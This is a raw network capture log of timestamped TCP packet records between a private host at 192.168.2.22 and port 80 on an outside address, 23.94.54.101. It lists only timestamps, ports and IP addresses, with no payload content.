May 4, 2024 10:02:38.755637884 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755650997 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755664110 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755676031 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755687952 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755695105 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755702972 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755722046 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755722046 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.755737066 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755749941 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755763054 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755776882 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755784035 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755789995 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755845070 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755882025 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.755882025 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.755897045 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.755902052 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755914927 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755928040 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755942106 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755956888 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.755971909 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.756014109 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.756025076 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.756037951 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.756048918 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.756062984 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.756078959 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.756086111 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.756093025 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.756129026 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.756140947 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.756150007 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.756151915 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.756198883 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.758295059 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.965982914 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966012001 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966025114 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966041088 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966058016 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966073990 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966089964 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966104031 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966118097 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966134071 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966149092 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966161966 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966166973 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.966175079 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966190100 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966198921 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.966198921 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.966203928 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966211081 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966218948 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966229916 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.966259956 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.966270924 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966286898 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966299057 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966312885 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966324091 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.966326952 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966340065 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966353893 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.966355085 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966368914 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966382027 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966386080 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.966396093 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966409922 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966424942 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966438055 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966444969 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.966466904 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.966466904 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.966490030 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.968272924 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968290091 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968342066 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968344927 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.968411922 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968424082 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968441963 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968456030 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968458891 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.968470097 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968485117 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.968508959 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.968522072 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968534946 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968548059 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968561888 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968575001 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968584061 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.968589067 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968614101 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968630075 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.968648911 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968653917 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.968672037 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968687057 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968700886 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:38.968713999 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.968741894 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.976682901 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:38.978646994 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.178333998 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.178360939 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.178376913 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.178390980 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.178407907 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.178421974 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.178437948 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.178459883 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.178472042 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.178481102 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.178488016 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.178502083 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.178550005 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.178590059 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.178626060 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.178626060 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.179676056 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.179692030 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.179758072 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.180052996 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180067062 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180082083 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180095911 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180116892 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180125952 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.180130005 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180139065 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.180145025 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180160999 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180171967 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.180174112 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180187941 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180201054 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180213928 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180227041 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.180228949 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180248976 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180260897 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180268049 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180279016 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.180295944 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.180315018 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180329084 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180340052 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180354118 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180361032 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.180366039 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180378914 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180382967 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.180393934 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180404902 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.180408001 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180438042 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.180493116 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180506945 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180520058 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.180535078 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.180560112 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.181504011 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.187372923 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.187386036 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.187398911 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.187448978 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.188419104 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.189207077 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.189220905 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.189233065 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.189277887 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.189383984 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.189399004 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.189443111 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.189893007 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394402981 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394423008 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394448996 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394455910 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394464016 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394469976 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394476891 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394490004 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394503117 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394516945 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394520998 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394527912 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394534111 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394540071 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394552946 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394557953 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394586086 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394618988 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394629955 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394642115 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394653082 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394659042 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394664049 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394676924 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394686937 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394687891 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394701958 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394715071 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394726038 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394731998 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394738913 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394751072 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394757032 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394768000 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394782066 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394784927 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394797087 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394809008 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394809961 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394819975 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394831896 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394834995 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394843102 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394855022 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394861937 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394865990 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394879103 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394889116 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394890070 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394907951 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394907951 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394921064 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394932032 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394937038 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394937992 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394951105 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394962072 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394973040 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.394973040 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394984961 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394992113 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.394994974 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395004034 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395015001 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395023108 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395025969 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395035028 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395037889 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395050049 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395061016 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395065069 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395071983 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395082951 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395087004 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395096064 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395109892 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395113945 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395123005 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395133972 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395136118 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395148039 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395159006 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395164967 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395170927 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395181894 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395185947 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395194054 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395206928 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395207882 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395217896 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395230055 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395231009 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395240068 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395251989 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395262957 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395263910 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395271063 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395276070 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395287991 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395299911 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395302057 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395311117 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395322084 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395332098 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395334005 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395347118 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395348072 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395356894 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395373106 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395390987 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395399094 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395411968 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395422935 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395450115 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395581961 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395592928 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395605087 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.395626068 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.395637035 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.397492886 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.401226044 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.401249886 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.401263952 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.401278019 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.401293993 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.401333094 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.401647091 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.401791096 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.401837111 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.403105021 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.403119087 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.403131008 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.403145075 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.403157949 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.403162956 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.403172970 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.403182983 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.403194904 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.403207064 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.403219938 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.403219938 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.403239965 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.403243065 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.403310061 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.413675070 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.416399956 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.604681969 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.604702950 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.604824066 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.604830980 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.604840040 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.604877949 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.604892969 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.604902983 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.604904890 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.604919910 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.604926109 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.604952097 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.604965925 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.604990005 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.604993105 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.605003119 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.605031967 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.605060101 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.605098963 CEST	49161	80	192.168.2.22	23.94.54.101
